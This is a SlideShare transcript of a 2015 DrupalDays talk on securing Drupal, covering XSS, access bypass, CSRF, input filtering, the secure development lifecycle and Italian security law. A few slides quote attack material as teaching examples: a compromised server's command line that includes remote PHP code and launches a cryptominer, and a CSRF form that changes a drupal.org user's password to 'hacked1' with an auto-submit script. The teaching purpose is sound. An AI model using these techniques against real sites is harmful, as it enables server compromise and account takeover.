Download to read offline
![#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
[20:51:04]
root@bal-‐XXXX.prod:/var/log/nginx#
zgrep
"POST
/
HTTP/1.1"
access.log
|
egrep
-‐o
'forwarded_for="[^s,"]+?'
|
cut
-‐d'"'
-‐f2
|
sort
|
uniq
-‐c
|
sort
-‐nr
|
head
-‐30
2112
104.130.25.XXX
1144
37.221.162.XXX
1067
185.13.37.XXX
1066
77.247.181.XXX
1058
77.109.141.XXX
1047
5.135.158.XXX
1042
178.175.139.XXX
HTTP Flood](https://image.slidesharecdn.com/2015-drupal-sdlc-150212124406-conversion-gate01/85/Secure-Drupal-from-start-to-finish-8-320.jpg)
![#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
/**
* Preprocess function to replace the regular label with the
* display label
*/
function field_display_label_preprocess_field(&$variables) {
$field = field_info_instance(...);
if (
isset($field['display_label']) &&
strlen(trim($field['display_label'])) > 0
) {
$variables['label'] = $field['display_label'];
1. XSS
From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?
id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67](https://image.slidesharecdn.com/2015-drupal-sdlc-150212124406-conversion-gate01/85/Secure-Drupal-from-start-to-finish-13-320.jpg)
![#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
Use t('@') syntax!
$text = t(
"@name's blog",
[ '@name' => format_username($account) ]
);](https://image.slidesharecdn.com/2015-drupal-sdlc-150212124406-conversion-gate01/85/Secure-Drupal-from-start-to-finish-15-320.jpg)
![#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
$_GET, $_POST, $_REQUEST, $_COOKIE,
$_SERVER, $_FILES, $argv
everything from the database
$form_state (mostly ['input'])
arg
drupal_get_query_parameters
drupal_current_script_url
drupal_detect_baseurl
request_path
What is input?](https://image.slidesharecdn.com/2015-drupal-sdlc-150212124406-conversion-gate01/85/Secure-Drupal-from-start-to-finish-17-320.jpg)
![#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<form
action="https://www.drupal.org/user/2457520/edit"
method="post">
<input type="hidden"
name="pass[pass1]"
value="hacked1"
/>
3. Cross Site Request Forgery](https://image.slidesharecdn.com/2015-drupal-sdlc-150212124406-conversion-gate01/85/Secure-Drupal-from-start-to-finish-25-320.jpg)
Uploaded byBoy Baukema
Secure Drupal, from start to finish
This document discusses security measures for Drupal, emphasizing secure development practices and ongoing security assessments. It covers various threats such as cross-site request forgery and SQL injection, while recommending best practices for input filtering, output encoding, and vulnerability management. The importance of education and the legal implications of security failures are also highlighted.
Secure Drupal, from start to finish
- 1. © Ibuildings 2014/2015- All rights reserved #DrupalDaysEU Secure Drupal From start to finish
- 2. © Ibuildings 2014/2015- All rights reserved Speaker Info Boy Baukema Security Specialist boy@ibuildings.nl @relaxnow
- 3. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Security Specialist • R&D Security • Internal & External • Security Training • Consulting • Security Audits A Security what?
- 4. © Ibuildings 2014/2015- All rights reserved This is the Talk Title and it could be very long, for example on two lines or more
- 5. © Ibuildings 2014/2015- All rights reserved
- 6. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 7. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved /usr/sbin/apache2 -‐k start _ /usr/sbin/apache2 -‐k start _ /usr/local/php539/bin/php-‐cgi -‐dauto_prepend_file=http://XXX.XXX.XXX.XXX/ one.txt -‐dallow_url_include=on _ sh -‐c /tmp/sh.sh _ ./minerd -‐a scrypt -‐o stratum+tcp://multi.ghash.io:3333 -‐u lscllc.worker16 -‐p x Such hacked. Much coins.
- 8. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved [20:51:04] root@bal-‐XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -‐o 'forwarded_for="[^s,"]+?' | cut -‐d'"' -‐f2 | sort | uniq -‐c | sort -‐nr | head -‐30 2112 104.130.25.XXX 1144 37.221.162.XXX 1067 185.13.37.XXX 1066 77.247.181.XXX 1058 77.109.141.XXX 1047 5.135.158.XXX 1042 178.175.139.XXX HTTP Flood
- 9. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 10. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Drupal Top 3 • Secure Development Lifecycle • The Law The Plan
- 11. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved // to expand it out into a comma-delimited set of placeholders. foreach (array_filter($args, 'is_array') as $key => $data) { $new_keys = array(); foreach ($data as $i => $value) { // This assumes that there are no other placeholders that use the same // name. For example, if the array placeholder is defined as :example // and there is already an :example_2 placeholder, this will generate /includes/database/database.inc
- 12. © Ibuildings 2014/2015- All rights reserved This is the Talk Title and it could be very long, for example on two lines or more Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/ 201403/drupal-security-whitepaper-1-3.pdf
- 13. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved /** * Preprocess function to replace the regular label with the * display label */ function field_display_label_preprocess_field(&$variables) { $field = field_info_instance(...); if ( isset($field['display_label']) && strlen(trim($field['display_label'])) > 0 ) { $variables['label'] = $field['display_label']; 1. XSS From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module? id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
- 14. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved 1. drupal_set_message 2. l 3. watchdog Which function(s) should receive check_plain() content
- 15. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved 1. drupal_set_message 2. l 3. watchdog Which function(s) should receive check_plain() content Use t('@') syntax! $text = t( "@name's blog", [ '@name' => format_username($account) ] );
- 16. © Ibuildings 2014/2015- All rights reserved Filter Input As early as possible
- 17. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved $_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv everything from the database $form_state (mostly ['input']) arg drupal_get_query_parameters drupal_current_script_url drupal_detect_baseurl request_path What is input?
- 18. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Sanitize: $id = (int) arg(1); $accountEnabled = (bool) arg(1); Validate: Form validators in_array() mb_strlen() > 1024 url_is_external valid_url Filter / Sanitize / Validate
- 19. © Ibuildings 2014/2015- All rights reserved Encode Output As late as possible
- 20. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 21. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved // This is to be accessible to all users, // so 'access callback' can be set // to TRUE, meaning that we should // bypass all access checks. 'access callback' => TRUE, 2. Access Bypass
- 22. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved global $user; if ($user->uid = 1) { watchdog('mymodule', request_uri()); } A disturbance in the force
- 23. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • IDE / code sniffer (coder tools) • if (1 = $uid) • === instead of == • user_uid_optional_load($uid = NULL) Avoiding accidental assign
- 24. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved <form action="http://mysite.com/contact" method="post" /> 3. Cross Site Request Forgery
- 25. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved <form action="https://www.drupal.org/user/2457520/edit" method="post"> <input type="hidden" name="pass[pass1]" value="hacked1" /> 3. Cross Site Request Forgery
- 26. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved <script> $('#contactform').submit(); </script> 3. Cross Site Request Forgery
- 27. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 28. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved => drupal_get_token <= drupal_valid_token Drupal Forms to the rescue!
- 29. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Authentication / Session • Arbitrary Code Execution • Denial of Service • Information Disclosure • Logic error • Open Redirect • Password Protection Bypass • Session Fixation • SQL Injection • .... 4. Others
- 30. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 31. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 32. © Ibuildings 2014/2015- All rights reserved This is the Talk Title and it could be very long, for example on two lines or more
- 33. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved 1. Education & Guidance
- 34. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Threat Assessment • Security Requirements 2. Design time security
- 35. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Architecture Review • Code Review 3. Security Review
- 36. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved 4. Security Testing The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls.
- 37. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Identify third party dependencies • ... follow their Security Mailinglists • Make rebuilding painless. • Make redeploying painless. • Backup & restore from backup 'regularly' 5. Vulnerability Management
- 38. © Ibuildings 2014/2015- All rights reserved This is the Talk Title and it could be very long, for example on two lines or more
- 39. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors
- 40. © Ibuildings 2014/2015- All rights reserved The Law
- 41. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved the penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment up to two years); damages -the manager has the burden of proof that he took all that was possible to avoid the damage, referring to appropriate practice known techniques of computer security , while the victim must only prove the existence of damage. Misure minime di sicurezza
- 42. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Individually associated accounts • > 8 character passwords • Changed every 3 to 6 months • Do not leave admin unattended • Privileges on need to know basis • Verify privileges at least yearly • Update at least every 6 months • Backup data at least weekly Disciplinare tecnico
- 43. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Gold Sponsors Bob's Story
- 44. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved Responsible Disclosure
- 45. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • Know your law • Think like an attacker • ... but don't become one (without permission) • Make sure white hats have a place to go • Filter Input, Encode Output • Train your developers • Design with security in mind • Review and be critical • Trust but verify that you are secure • Perform active automated maintenance In summary
- 46. #DrupalDaysEU © Ibuildings 2014/2015- All rights reserved • http://www.slideshare.net/relaxnow/drupaldays-2015 • http://crackingdrupal.com • http://drupalsecurityreport.com • http://drupal.org/writing-secure-code • http://owasp.org • OWASP ASVS The End